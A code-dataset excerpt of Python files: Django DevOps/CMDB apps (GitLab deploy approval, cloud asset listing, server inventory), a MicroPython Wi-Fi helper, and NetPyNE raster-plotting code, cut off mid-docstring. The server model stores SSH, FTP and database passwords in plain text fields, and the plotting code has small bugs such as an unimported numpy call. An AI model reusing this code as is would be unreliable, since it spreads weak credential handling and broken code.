metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "joewen85/devops_study",
"score": 2
} |
#### File: apps/cmdb/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from django.views.generic import TemplateView
from django.contrib.auth.mixins import LoginRequiredMixin
from pure_pagination.mixins import PaginationMixin
from utils.aliyun_api import AliyunApi
from utils.tencentyun_api import TencentYun_api
from devops_study import settings
class CmdbListView(LoginRequiredMixin, PaginationMixin, TemplateView):
login_url = '/login/'
template_name = 'cmdb/cmdb_list.html'
paginate_by = 20
region = "cn-shanghai"
def get_context_data(self, **kwargs):
context = {}
# get ali asset
ali = AliyunApi(settings.AliYun_AK, settings.AliYun_SK, self.region)
context['ali'] = ali.get_describe_instances()
# for i in data_json['Instances']['Instance']:
# context.append(i)
# get tencent asset
tencent = TencentYun_api(settings.TencentYun_AK, settings.TencentYun_SK)
context['tencent'] = tencent.get_describe_instances('ap-guangzhou')
return context
```
#### File: apps/deploy/views.py
```python
import json
from django.shortcuts import render, redirect, reverse
from django.views.generic import TemplateView, View, ListView, DetailView
from utils.gitlab_api import GitLab_ApiV4
from django.http import HttpResponse, JsonResponse
from django.contrib.auth.mixins import LoginRequiredMixin
from .forms import DeployForm
from .models import DeployModel
from pure_pagination.mixins import PaginationMixin
from django.db.models import Q
from users.models import UserProfile
from devops_study import settings
# Create your views here.
class DeployApplyView(LoginRequiredMixin, TemplateView):
login_url = '/login/'
template_name = 'deploy/deply_apply.html'
def get_context_data(self, **kwargs):
context = super(DeployApplyView, self).get_context_data(**kwargs)
user = self.request.user.username
gl = GitLab_ApiV4(settings.GITURL, settings.GIILAB_PRIVATE_TOKEN)
user_obj = gl.get_users(user)
# context['user_projects'] = gl.get_all_project()
try:
user_projects = user_obj.projects.list()
context['user_projects'] = user_projects
except:
context['user_projects'] = None
return context
def post(self, request):
deployform = DeployForm(request.POST)
if deployform.is_valid():
data = deployform.cleaned_data
data['status'] = 0
data['applicant'] = self.request.user
name = data['name'].split('/')[1]
data['name'] = name
has_apply = DeployModel.objects.filter(name=name, status__lte=2)
if has_apply:
return render(request, 'deploy/deply_apply.html', {'errmsg': '该项目已经申请上线,但是上线还没有完成,上线完成后方可再次申请!'})
try:
DeployModel.objects.create(**data)
return redirect(reverse('deploy:list'))
except:
return render(request, 'deploy/deply_apply.html', {'errmsg': '申请失败,请查看日志'})
else:
return render(request, 'deploy/deply_apply.html', {'forms': deployform, 'errmsg': '填写格式错误'})
class DeployProjectVersionView(LoginRequiredMixin, View):
def get(self, request):
project_id = request.GET.get('project_id').split('/')[0]
project = GitLab_ApiV4(settings.GITURL, settings.GIILAB_PRIVATE_TOKEN)
tags = project.get_project_version(int(project_id))
tags = [[tag.name, tag.message] for tag in tags]
# print(tags)
return HttpResponse(json.dumps(tags),content_type='application/json')
class DeployProjectBranchView(LoginRequiredMixin, View):
def get(self, request):
project_id = request.GET.get('project_id').split('/')[0]
project = GitLab_ApiV4(settings.GITURL, settings.GIILAB_PRIVATE_TOKEN)
branchs = project.get_project_branchs(project_id)
branchs = [[branch.name, branch.commit['message']] for branch in branchs]
# print(branchs)
return HttpResponse(json.dumps(branchs), content_type='application/json')
class DeployApplyList(LoginRequiredMixin, PaginationMixin, ListView):
login_url = '/login/'
model = DeployModel
context_object_name = 'apply_list'
template_name = 'deploy/deployapply_list.html'
paginate_by = 10
keyword = ''
def get_queryset(self):
# queryset = super(DeployApplyList, self).get_queryset()
user_id = self.request.user.id
user_groups = [group.name for group in UserProfile.objects.get(pk=user_id).groups.all()]
if self.request.user.is_superuser or ('op' in user_groups or 'test' in user_groups):
queryset = self.model.objects.filter(status__lt=2)
else:
queryset = self.model.objects.filter(applicant=user_id).filter(status__lt=2)
try:
self.keyword = self.request.GET.get('keyword', '').strip()
queryset = queryset.filter(Q(name__icontains=self.keyword) | Q(version__contains=self.keyword) | Q(version_desc__icontains=self.keyword))
except Exception as e:
print(e)
return queryset
def get_context_data(self, *, object_list=None, **kwargs):
context = super(DeployApplyList, self).get_context_data(**kwargs)
context['keyword'] = self.keyword
return context
def post(self, request, **kwargs):
pk = self.request.POST.get('apply_id')
try:
self.model.objects.filter(pk=pk).delete()
data = {'code': 0, 'result': 'success'}
except Exception as e:
data = {'code': 1, 'errmsg': '取消失败'}
return JsonResponse(data)
class DeployDetailView(LoginRequiredMixin, DetailView):
login_url = '/login/'
model = DeployModel
template_name = 'deploy/deploy_detail.html'
context_object_name = 'deploy'
def get_context_data(self, **kwargs):
context = super(DeployDetailView, self).get_context_data(**kwargs)
user_id = self.request.user.id
user_groups = [group.name for group in UserProfile.objects.get(pk=user_id).groups.all()]
if 'op' in user_groups or 'test' in user_groups:
context['is_reviewer'] = True
else:
context['is_reviewer'] = False
return context
def post(self, request, **kwargs):
pk = self.kwargs.get('pk')
user_id = self.request.user.id
status = self.model.objects.get(pk=pk).status
if status == 0:
self.model.objects.filter(pk=pk).update(status=1, reviewer=user_id)
elif status == 1:
self.model.objects.filter(pk=pk).update(status=2, handle=user_id)
return redirect(reverse('deploy:deploy', kwargs={'pk': pk}))
class DeployHistoryView(LoginRequiredMixin, ListView):
login_url = '/login/'
model = DeployModel
template_name = 'deploy/deploy_history.html'
context_object_name = 'history_list'
keyword = ''
def get_queryset(self):
# queryset = super(DeployHistoryView, self).get_queryset()
user_id = self.request.user.id
self.keyword = self.request.GET.get('keyword', '').strip()
user_group_list = [group.name for group in UserProfile.objects.get(pk=user_id).groups.all()]
# 判断用户是否超级管理员和是否op组或者test组
if self.request.user.is_superuser or ('op' in user_group_list or 'test' in user_group_list):
queryset = self.model.objects.filter(status__gte=2).filter(Q(name__icontains=self.keyword) | Q(version_desc__icontains=self.keyword))
else:
queryset = self.model.objects.filter(status__gte=2).filter(applicant=user_id).filter(Q(name__icontains=self.keyword) | Q(version_desc__icontains=self.keyword))
return queryset
def get_context_data(self, *, object_list=None, **kwargs):
context = super(DeployHistoryView, self).get_context_data(**kwargs)
context['keyword'] = self.keyword
return context
```
#### File: apps/users/forms.py
```python
import re
from django.core import validators
from django import forms
from django.contrib.auth.models import Group, Permission
from .models import UserProfile
class LoginForm(forms.Form):
username = forms.CharField(required=True, max_length=20)
password = forms.CharField(required=True, min_length=6)
# 添加用户表单验证
class UserProfileForm(forms.ModelForm):
# phone = forms.CharField(max_length=11, messages='请出入正确格式的号码!')
# pwd1 = forms.CharField(max_length=16, min_length=6)
# pwd2 = forms.CharField(max_length=16, min_length=6)
class Meta:
model = UserProfile
fields = ['username', 'name', 'phone']
error_messages = {
'username': {
'unique': '用户名已存在'
}
}
def clean_phone(self):
"""
通过正则表达式验证手机号码是否合法
"""
phone = self.cleaned_data['phone']
phone_regex = r'1[345678]\d{9}'
p = re.compile(phone_regex)
if p.match(phone):
return phone
else:
raise forms.ValidationError('手机号码非法', code='invalid')
class UpdateForm(forms.Form):
username = forms.CharField(max_length=20, required=True)
name = forms.CharField(max_length=32, required=True)
phone = forms.CharField(max_length=11, required=True)
email = forms.EmailField()
def clean_phone(self):
phone = self.cleaned_data.get('phone')
phone_regex = r'^1[34578][0-9]{9}$'
p = re.compile(phone_regex)
if p.match(phone):
return phone
else:
raise forms.ValidationError('手机号码非法', code='invalid')
class PasswordForm(forms.Form):
pwd1 = forms.CharField(max_length=16, min_length=6)
pwd2 = forms.CharField(max_length=16, min_length=6)
def clean(self):
cleaned_data = super().clean()
pwd1 = cleaned_data.get('pwd1')
pwd2 = cleaned_data.get('pwd2')
if pwd1 != pwd2:
raise forms.ValidationError("两次输入密码不一致", code='invalid')
return cleaned_data
```
#### File: apps/users/models.py
```python
from django.db import models
from django.contrib.auth.models import AbstractUser, PermissionsMixin
class UserProfile(AbstractUser):
"""
用户类,添加name和phone字段
"""
name = models.CharField(max_length=32, verbose_name="姓名")
phone = models.CharField(max_length=11, verbose_name="手机号码")
class Meta:
verbose_name = "用户"
verbose_name_plural = verbose_name
ordering = ['-id']
app_label = 'users'
def __str__(self):
return self.username
``` |
{
"source": "joewen85/mycmdb",
"score": 2
} |
#### File: apps/device/models.py
```python
from django.contrib.auth.models import User
from django.db import models
# Create your models here.
class Cloudips(models.Model):
"""服务器运营商"""
cloudipsname = models.CharField(max_length=10, verbose_name="服务器运营商")
describe = models.CharField(max_length=10, verbose_name="描述")
created_at = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
updated_at = models.DateTimeField(auto_now=True, verbose_name="修改时间")
class Meta:
verbose_name = "服务器运营商"
verbose_name_plural = verbose_name
def __str__(self):
return self.describe
class Envirment(models.Model):
"""服务器环境"""
envname = models.CharField(max_length=20, verbose_name="服务器运行环境")
describe = models.CharField(max_length=20, verbose_name="描述")
created_at = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
updated_at = models.DateTimeField(auto_now=True, verbose_name="修改时间")
phpbin = models.CharField(max_length=100, verbose_name="PHP环境路径", null=True)
vhost_path = models.CharField(max_length=100, verbose_name="网站虚拟目录路径", null=True)
fastcgi_pass = models.CharField(max_length=64, verbose_name="后端PHP处理方式", null=True, blank=True)
class Meta:
verbose_name = "运行环境"
verbose_name_plural = verbose_name
def __str__(self):
return self.describe
class Jobs(models.Model):
"""任务"""
jid = models.AutoField(primary_key=True)
name = models.CharField(max_length=50, verbose_name="任务名称")
path = models.CharField(max_length=100, verbose_name="任务路径")
describe = models.CharField(max_length=50, verbose_name="描述")
class Meta:
verbose_name = "任务"
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Device(models.Model):
"""服务器详情"""
hostname = models.CharField(max_length=50, verbose_name="服务器名称", null=False, unique=True, db_index=True)
ipaddress = models.GenericIPAddressField(verbose_name='服务器IP地址', db_index=True)
sshuser = models.CharField(max_length=20, verbose_name="服务器登陆用户")
sshpassword = models.CharField(max_length=50, verbose_name="服务器登陆密码", null=False)
websitepath = models.CharField(max_length=200, verbose_name="网站存放位置", null=False)
envirment = models.ForeignKey(Envirment, verbose_name="运行环境", on_delete=models.DO_NOTHING)
cloudips = models.ForeignKey(Cloudips, verbose_name="服务器运营商", on_delete=models.DO_NOTHING)
customer_name = models.CharField(max_length=50, verbose_name="客户用户名", null=True)
sshport = models.PositiveSmallIntegerField(verbose_name="服务器登陆端口", default=22)
created_at = models.DateTimeField(auto_now_add=True, verbose_name="创建时间")
updated_at = models.DateTimeField(auto_now=True, verbose_name="修改时间")
# is_monitor = models.BooleanField(verbose_name="是否监控")
is_maintenance = models.BooleanField(verbose_name="是否维护", default=0)
maintenance_duration = models.CharField(max_length=25, verbose_name="维护期限", null=True, blank=True)
deploy_times = models.IntegerField(verbose_name="部署队列和计划任务次数", default=0)
deploy_weiqingshop_times = models.SmallIntegerField(verbose_name="部署框架与商城次数", default=0)
deploy_frameworkshop_times = models.SmallIntegerField(verbose_name="部署微擎与商城次数", default=0)
others = models.TextField(verbose_name="其他内容", null=True, blank=True)
paid = models.BooleanField(verbose_name="商城收费客户", default=0)
ftpuser = models.CharField(max_length=32, default='www', verbose_name="ftp用户名")
ftppassword = models.CharField(max_length=32, verbose_name="ftp密码", null=True)
mysqluser = models.CharField(max_length=32, default='root', verbose_name="mysql用户名")
mysqlpassword = models.CharField(max_length=32, verbose_name="mysql密码", null=True)
mysqladdress = models.CharField(max_length=64, default='127.0.0.1', verbose_name="mysql连接地址")
# 商城版本 0为独立版,1为微擎版
shop_version = models.BooleanField(verbose_name="商城版本", default=0)
mongodbuser = models.CharField(max_length=32, verbose_name='mongodb用户名', default='root')
mongodbaddress = models.CharField(max_length=64, verbose_name='mongodb连接地址', default='127.0.0.1')
class Meta:
verbose_name = "用户设备信息"
verbose_name_plural = verbose_name
def __str__(self):
return self.hostname
class Deploy_record(models.Model):
"""部署队列和计划任务记录"""
hostname = models.ForeignKey(Device, related_name='deploy_record', verbose_name="服务器名称", on_delete=models.CASCADE)
# hostname = models.CharField(verbose_name="服务器名称", max_length=32, null=True)
deploy_datetime = models.DateTimeField(auto_now_add=True, verbose_name="部署时间")
desc = models.CharField(max_length=100, verbose_name="描述", null=True)
operator = models.CharField(max_length=20, verbose_name="操作员", null=True)
# operator = models.ForeignKey(User, verbose_name="操作员", on_delete=models.DO_NOTHING, null=True)
remote_ip = models.GenericIPAddressField(verbose_name="远程访问地址", null=True)
# jobname = models.ForeignKey(Jobs, on_delete=models.DO_NOTHING, null=True, verbose_name="任务名称")
jobname = models.CharField(max_length=32, null=True, verbose_name="任务名称")
result = models.TextField(null=True, verbose_name="执行任务结果")
class Meta:
verbose_name = "部署记录"
verbose_name_plural = verbose_name
def __str__(self):
return "结果"
class Password_record(models.Model):
"""独立密码表"""
ipaddress = models.ForeignKey(Device, db_column="server_ip", related_name="PASSWORD", on_delete=models.CASCADE)
sshpassword = models.CharField(max_length=600, verbose_name="服务器登陆密码", null=False)
ftppassword = models.CharField(max_length=600, verbose_name="ftp密码", null=True)
mysqlpassword = models.CharField(max_length=600, verbose_name="mysql密码", null=True)
mongodbpassword = models.CharField(max_length=600, verbose_name="mongodb密码", null=True)
def __str__(self):
return "密码表"
class Meta:
verbose_name = "密码表"
verbose_name_plural = verbose_name
default_permissions = ()
permissions = (
("select_table", "查看密码表"),
("change_table", "修改密码表"),
("decode_password", "解密加密密码")
)
```
#### File: apps/domain/models.py
```python
from django.db import models
from device.models import Device
# Create your models here.
class DomainDetail(models.Model):
domain = models.CharField(max_length=50, verbose_name="域名", db_index=True, unique=True)
# 黑名单为1,白名单为0
is_blacklist = models.BooleanField(verbose_name="是否黑名单", default=0)
class Meta:
verbose_name = "域名详情"
verbose_name_plural = verbose_name
def __str__(self):
return self.domain
```
#### File: apps/webssh/tools.py
```python
import time
import random
import hashlib
def get_key_obj(pkeyobj, pkey_file=None, pkey_obj=None, password=None):
if pkey_file:
with open(pkey_file) as fp:
try:
pkey = pkeyobj.from_private_key(fp, password=password)
return pkey
except:
pass
else:
try:
pkey = pkeyobj.from_private_key(pkey_obj, password=password)
return pkey
except:
pkey_obj.seek(0)
def unique():
ctime = str(time.time())
salt = str(random.random())
m = hashlib.md5(bytes(salt, encoding='utf-8'))
m.update(bytes(ctime, encoding='utf-8'))
return m.hexdigest()
``` |
{
"source": "joewez/FunWithMicroPython",
"score": 3
} |
#### File: FunWithMicroPython/frozen/wifi.py
```python
import network
def connect(ssid, password="", silent=True):
ap = network.WLAN(network.AP_IF)
ap.active(False)
wlan = network.WLAN(network.STA_IF)
wlan.active(True)
if not wlan.isconnected():
if not silent:
print('connecting to network...')
wlan.connect(ssid, password)
while not wlan.isconnected():
pass
if not silent:
print('network config:', wlan.ifconfig())
def disconnect(silent=True):
wlan = network.WLAN(network.STA_IF)
wlan.active(False)
while wlan.isconnected():
pass
if not silent:
print('disconnected.')
def access_point(ssid, passphrase="", silent=True):
wlan = network.WLAN(network.STA_IF)
wlan.active(False)
while wlan.isconnected():
pass
ap = network.WLAN(network.AP_IF)
ap.active(True)
if (passphrase == ''):
ap.config(essid=ssid, password="", authmode=1)
else:
ap.config(essid=ssid, password=passphrase, authmode=4)
if not silent:
print('network config:', ap.ifconfig())
def none(silent=True):
ap = network.WLAN(network.AP_IF)
ap.active(False)
wlan = network.WLAN(network.STA_IF)
wlan.active(False)
while wlan.isconnected():
pass
if not silent:
print('wifi off')
def off():
none()
def scan():
import esp
import time
esp.osdebug(None)
wlan = network.WLAN(network.STA_IF)
state = wlan.active()
wlan.active(True)
time.sleep(2)
print('Scanning...')
nets = wlan.scan()
for net in nets:
print(' ' + str(net[0], "utf-8"))
if not state:
wlan.active(False)
esp.osdebug(0)
def status():
ap = network.WLAN(network.AP_IF)
print('AP :{0}'.format(ap.active()))
if (ap.active()):
(address, mask, gateway, dns) = ap.ifconfig()
print(' IP :{0}'.format(address))
print(' GW :{0}'.format(gateway))
print(' DNS:{0}'.format(dns))
sta = network.WLAN(network.STA_IF)
print('STA:{0}'.format(sta.active()))
if (sta.active()):
(address, mask, gateway, dns) = sta.ifconfig()
print(' IP :{0}'.format(address))
print(' GW :{0}'.format(gateway))
print(' DNS:{0}'.format(dns))
ma = ":".join(map(lambda x: "%02x" % x, sta.config('mac')))
print('MAC:{0}'.format(ma))
def connected():
wlan = network.WLAN(network.STA_IF)
return wlan.isconnected()
def debug(state=True):
import esp
if state:
esp.osdebug(0)
else:
esp.osdebug(None)
def man():
print("""
Commands:
connect(ssid, [password], [silent]) - Connect to and access point*
disconnect([silent]) - Diconnect from the current access point*
access_point(ssid, [passphrase], [silent]) - Create an Access Point*
none([silent]) - Turn all WiFi interfaces off*
off() - Same as none()
scan() - List avaiable access points
status() - Show current WiFi status
connected() - Return status of the STA connection
debug(state) - Turns the debug messages on and off*
* = Setting will PERSIST a reboot
""")
def help():
man()
def version():
return '1.2.0'
``` |
{
"source": "joewgraham/netpyne",
"score": 3
} |
#### File: netpyne/plotting/plotRaster.py
```python
import matplotlib.patches as mpatches
from ..analysis.utils import exception #, loadData
from ..analysis.tools import loadData
from .plotter import ScatterPlotter
@exception
def plotRaster(
rasterData=None,
popNumCells=None,
popLabels=None,
popColors=None,
axis=None,
legend=True,
colorList=None,
orderInverse=False,
returnPlotter=False,
**kwargs):
"""Function to produce a raster plot of cell spiking, grouped by population
Parameters
----------
rasterData : list, tuple, dict, str
the data necessary to plot the raster (spike times and spike indices, at minimum).
*Default:* ``None`` uses ``analysis.prepareRaster`` to produce ``rasterData`` using the current NetPyNE sim object.
*Options:* if a *list* or a *tuple*, the first item must be a *list* of spike times and the second item must be a *list* the same length of spike indices (the id of the cell corresponding to that spike time). Optionally, a third item may be a *list* of *ints* representing the number of cells in each population (in lieu of ``popNumCells``). Optionally, a fourth item may be a *list* of *strs* representing the population names (in lieu of ``popLabels``).
If a *dict* it must have keys ``'spkTimes'`` and ``'spkInds'`` and may optionally include ``'popNumCells'`` and ``'popLabels'``.
If a *str* it must represent a file path to previously saved data.
popNumCells : list
a *list* of *ints* representing the number of cells in each population.
*Default:* ``None`` puts all cells into a single population.
popLabels : list
a *list* of *strs* of population names. Must be the same length as ``popNumCells``.
*Default:* ``None`` uses generic names.
popColors : dict
a *dict* of ``popLabels`` and their desired color.
*Default:* ``None`` draws from the NetPyNE default colorList.
axis : matplotlib axis
the axis to plot into, allowing overlaying of plots.
*Default:* ``None`` produces a new figure and axis.
legend : bool
whether or not to add a legend to the plot.
*Default:* ``True`` adds a legend.
colorList : list
a *list* of colors to draw from when plotting.
*Default:* ``None`` uses the default NetPyNE colorList.
orderInverse : bool
whether or not to invert the y axis (useful if populations are defined top-down).
*Default:* ``False`` does not invert the y-axis.
returnPlotter : bool
whether to return the figure or the NetPyNE Plotter object.
*Default:* ``False`` returns the figure.
Plot Options
------------
title : str
the axis title.
*Default:* ``'Raster Plot of Spiking'``
xlabel : str
label for x-axis.
*Default:* ``'Time (ms)'``
ylabel : str
label for y-axis.
*Default:* ``'Cells'``
s : int
marker size.
*Default:* ``5``
marker : str
marker symbol.
*Default:* ``'|'``
linewidth : int
line width (affects other sizes).
*Default:* ``2``
legendKwargs : dict
a *dict* containing any or all legend kwargs. These include ``'title'``, ``'loc'``, ``'fontsize'``, ``'bbox_to_anchor'``, ``'borderaxespad'``, and ``'handlelength'``.
rcParams : dict
a *dict* containing any or all matplotlib rcParams. To see all options, execute ``import matplotlib; print(matplotlib.rcParams)`` in Python. Any options in this *dict* will be used for this current figure and then returned to their prior settings.
overwrite : bool
whether to overwrite existing figure files.
*Default:* ``True`` overwrites the figure file
*Options:* ``False`` adds a number to the file name to prevent overwriting
NetPyNE Options
---------------
include : str, int, list
cells and/or NetStims to return information from
*Default:* ``'allCells'`` includes all cells and no NetStims
*Options:*
(1) ``'all'`` includes all cells and all NetStims,
(2) ``'allNetStims'`` includes all NetStims but no cells,
(3) a *str* which matches a popLabel includes all cells in that pop,
(4) a *str* which matches a NetStim name includes that NetStim,
(5) an *int* includes the cell with that global identifier (GID),
(6) a *list* of *ints* includes the cells with those GIDS,
(7) a *list* with two items, the first of which is a *str* matching a popLabel and the second of which is an *int* (or a *list* of *ints*), includes the relative cell(s) from that population (e.g. (``['popName', [0, 1]]``) includes the first two cells in popName.
timeRange : list
time range to include in the raster: ``[min, max]``.
*Default:* ``None`` uses the entire simulation
maxSpikes : int
the maximum number of spikes to include (by reducing the max time range).
*Default:* ``1e8``
orderBy : str
how to order the cells along the y-axis.
*Default:* ``'gid'`` orders cells by their index
*Options:* any NetPyNe cell tag, e.g. ``'pop'``, ``'x'``, ``'ynorm'`` .
popRates : bool
whether to include the spiking rates in the plot title and legend.
*Default:* ``True`` includes detailed pop information on plot.
*Options:*
``False`` only includes pop names.
``'minimal'`` includes minimal pop information.
saveData : bool
whether to save to a file the data used to create the figure.
*Default:* ``False`` does not save the data to file
fileName : str
if ``saveData`` is ``True``, this is the name of the saved file.
*Default:* ``None`` a file name is automatically generated.
fileDesc : str
an additional *str* to include in the file name just before the file extension.
*Default:* ``None`` includes no extra text in the file name.
fileType : str
the type of file to save the data to.
*Default:* ``json`` saves the file in JSON format.
*Options:* ``pkl`` saves the file in Python Pickle format.
fileDir : str
the directory to save the data to.
*Default:* ``None`` saves to the current directory.
sim : NetPyNE sim object
the *sim object* from which to get data.
*Default:* ``None`` uses the current NetPyNE sim object
Returns
-------
rasterPlot : *matplotlib figure*
By default, returns the *figure*. If ``returnPlotter`` is ``True``, instead returns the NetPyNE *Plotter object* used.
Examples
--------
There are many options available in plotRaster. To run a variety of examples, enter the following::
from netpyne.plotting import plotRaster
from netpyne.plotting.examples import spikeSim
sim = spikeSim()
First, let's just use mostly the default settings, though we will save the figure and the data. If ``rasterData`` is ``None`` (default), NetPyNE uses ``analysis.prepareRaster`` to generate the ``rasterData`` used in the plot::
plot = plotRaster(showFig=True, saveData=True)
Because we will just be looking at data from one example simulation, we don't need to reprocess the data every time. Let's save the output data, and then we can use that to generate more plots::
plot = plotRaster(showFig=True, saveFig=True overwrite=True, saveData=True)
This will save a data file with the raster data.
"""
# If there is no input data, get the data from the NetPyNE sim object
if rasterData is None:
if 'sim' not in kwargs:
from .. import sim
else:
sim = kwargs['sim']
rasterData = sim.analysis.prepareRaster(legend=legend, popLabels=popLabels, **kwargs)
print('Plotting raster...')
# If input is a file name, load data from the file
if type(rasterData) == str:
rasterData = loadData(rasterData)
# If input is a dictionary, pull the data out of it
if type(rasterData) == dict:
spkTimes = rasterData['spkTimes']
spkInds = rasterData['spkInds']
if not popNumCells:
popNumCells = rasterData.get('popNumCells')
if not popLabels:
popLabels = rasterData.get('popLabels')
axisArgs = rasterData.get('axisArgs')
legendLabels = rasterData.get('legendLabels')
# If input is a list or tuple, the first item is spike times, the second is spike indices
elif type(rasterData) == list or type(rasterData) == tuple:
spkTimes = rasterData[0]
spkInds = rasterData[1]
axisArgs = None
legendLabels = None
# If there is a third item, it should be popNumCells
if not popNumCells:
try: popNumCells = rasterData[2]
except: pass
# If there is a fourth item, it should be popLabels
if not popLabels:
try: popLabels = rasterData[3]
except: pass
# If there is no info about pops, generate info for a single pop
if not popNumCells:
popNumCells = [max(spkInds)]
if popLabels:
popLabels = [str(popLabels[0])]
else:
popLabels = ['population']
# If there is info about pop numbers, but not labels, generate the labels
elif not popLabels:
popLabels = ['pop_' + str(index) for index, pop in enumerate(popNumCells)]
# If there is info about pop numbers and labels, make sure they are the same size
if len(popNumCells) != len(popLabels):
raise Exception('In plotRaster, popNumCells (' + str(len(popNumCells)) + ') and popLabels (' + str(len(popLabels)) + ') must be the same size')
# Create a dictionary with the color for each pop
if not colorList:
from .plotter import colorList
popColorsTemp = {popLabel: colorList[ipop%len(colorList)] for ipop, popLabel in enumerate(popLabels)}
if popColors:
popColorsTemp.update(popColors)
popColors = popColorsTemp
# Create a list to link cells to their populations
indPop = []
for popLabel, popNumCell in zip(popLabels, popNumCells):
indPop.extend(int(popNumCell) * [popLabel])
# Create a dictionary to link cells to their population color
cellGids = list(set(spkInds))
gidColors = {cellGid: popColors[indPop[cellGid]] for cellGid in cellGids}
# Create a list of spkColors to be fed into the scatter plot
spkColors = [gidColors[spkInd] for spkInd in spkInds]
# Set the time range appropriately
if 'timeRange' in kwargs:
timeRange = kwargs['timeRange']
elif 'timeRange' in rasterData:
timeRange = rasterData['timeRange']
else:
timeRange = [0, np.ceil(max(spkTimes))]
# Create a dictionary with the inputs for a scatter plot
scatterData = {}
scatterData['x'] = spkTimes
scatterData['y'] = spkInds
scatterData['c'] = spkColors
scatterData['s'] = 5
scatterData['marker'] = '|'
scatterData['linewidth'] = 2
scatterData['cmap'] = None
scatterData['norm'] = None
scatterData['alpha'] = None
scatterData['linewidths'] = None
# If we use a kwarg, we add it to the list to be removed from kwargs
kwargDels = []
# If a kwarg matches a scatter input key, use the kwarg value instead of the default
for kwarg in kwargs:
if kwarg in scatterData:
scatterData[kwarg] = kwargs[kwarg]
kwargDels.append(kwarg)
# Create a dictionary to hold axis inputs
if not axisArgs:
axisArgs = {}
axisArgs['title'] = 'Raster Plot of Spiking'
axisArgs['xlabel'] = 'Time (ms)'
axisArgs['ylabel'] = 'Cells'
# If a kwarg matches an axis input key, use the kwarg value instead of the default
for kwarg in kwargs:
if kwarg in axisArgs.keys():
axisArgs[kwarg] = kwargs[kwarg]
kwargDels.append(kwarg)
# Delete any kwargs that have been used
for kwargDel in kwargDels:
kwargs.pop(kwargDel)
# create Plotter object
rasterPlotter = ScatterPlotter(data=scatterData, axis=axis, **axisArgs, **kwargs)
rasterPlotter.type = 'raster'
# add legend
if legend:
# Set up a dictionary of population colors
if not popColors:
colorList = colorList
popColors = {popLabel: colorList[ipop % len(colorList)] for ipop, popLabel in enumerate(popLabels)}
# Create the labels and handles for the legend
# (use rectangles instead of markers because some markers don't show up well)
labels = []
handles = []
for popIndex, popLabel in enumerate(popLabels):
if legendLabels:
labels.append(legendLabels[popIndex])
else:
labels.append(popLabel)
handles.append(mpatches.Rectangle((0, 0), 1, 1, fc=popColors[popLabel]))
# Set up the default legend settings
legendKwargs = {}
legendKwargs['title'] = 'Populations'
legendKwargs['bbox_to_anchor'] = (1.025, 1)
legendKwargs['loc'] = 2
legendKwargs['borderaxespad'] = 0.0
legendKwargs['handlelength'] = 0.5
legendKwargs['fontsize'] = 'small'
# If 'legendKwargs' is found in kwargs, use those values instead of the defaults
if 'legendKwargs' in kwargs:
legendKwargs_input = kwargs['legendKwargs']
kwargs.pop('legendKwargs')
for key, value in legendKwargs_input:
if key in legendKwargs:
legendKwargs[key] = value
# Add the legend
rasterPlotter.addLegend(handles, labels, **legendKwargs)
# Adjust the plot to make room for the legend
rightOffset = 0.8
maxLabelLen = max([len(label) for label in popLabels])
rasterPlotter.fig.subplots_adjust(right=(rightOffset - 0.012 * maxLabelLen))
# It is often useful to invert the ordering of cells, so positions match the legend
if orderInverse:
rasterPlotter.axis.invert_yaxis()
# Generate the figure
rasterPlot = rasterPlotter.plot(**axisArgs, **kwargs)
# Default is to return the figure, but you can also return the plotter
if returnPlotter:
return rasterPlotter
else:
return rasterPlot
```
#### File: netpyne/plotting/plotter.py
```python
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from copy import deepcopy
import pickle, json
import os
plt.ion()
try:
basestring
except NameError:
basestring = str
colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00],
[0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00],
[0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00],
[0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3
class GeneralPlotter:
"""A class used for plotting"""
def __init__(self, data, axis=None, sim=None, rcParams=None, **kwargs):
"""
Parameters
----------
data : dict, str
axis : matplotlib axis
The axis to plot into. If axis is set to None, a new figure and axis are created and plotted into. If plotting into an existing axis, more options are available: xtwin, ytwin,
"""
if type(data) == str:
if os.path.isfile(data):
self.data = self.loadData(data)
else:
raise Exception('In Plotter, if data is a string, it must be the path to a data file.')
else:
self.data = data
if not sim:
from .. import sim
self.sim = sim
self.axis = axis
# Make a copy of the current matplotlib rcParams and update them
self.orig_rcParams = deepcopy(mpl.rcParams)
if rcParams:
for rcParam in rcParams:
if rcParam in mpl.rcParams:
mpl.rcParams[rcParam] = rcParams[rcParam]
else:
print(rcParam, 'not found in matplotlib.rcParams')
self.rcParams = rcParams
else:
self.rcParams = self.orig_rcParams
# If an axis is input, plot there; therwise make a new figure and axis
if self.axis is None:
if 'figSize' in kwargs:
figSize = kwargs['figSize']
else:
figSize = self.rcParams['figure.figsize']
self.fig, self.axis = plt.subplots(figsize=figSize)
else:
self.fig = plt.gcf()
def loadData(self, fileName, fileDir=None, sim=None):
from ..analysis import loadData
self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None)
def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs):
from ..analysis import saveData as saveFigData
saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs)
def formatAxis(self, **kwargs):
if 'title' in kwargs:
self.axis.set_title(kwargs['title'])
if 'xlabel' in kwargs:
self.axis.set_xlabel(kwargs['xlabel'])
if 'ylabel' in kwargs:
self.axis.set_ylabel(kwargs['ylabel'])
if 'xlim' in kwargs:
if kwargs['xlim'] is not None:
self.axis.set_xlim(kwargs['xlim'])
if 'ylim' in kwargs:
if kwargs['ylim'] is not None:
self.axis.set_ylim(kwargs['ylim'])
def saveFig(self, fileName=None, fileDesc=None, fileType='png', fileDir=None, overwrite=True, **kwargs):
"""
'eps': 'Encapsulated Postscript',
'jpg': 'Joint Photographic Experts Group',
'jpeg': 'Joint Photographic Experts Group',
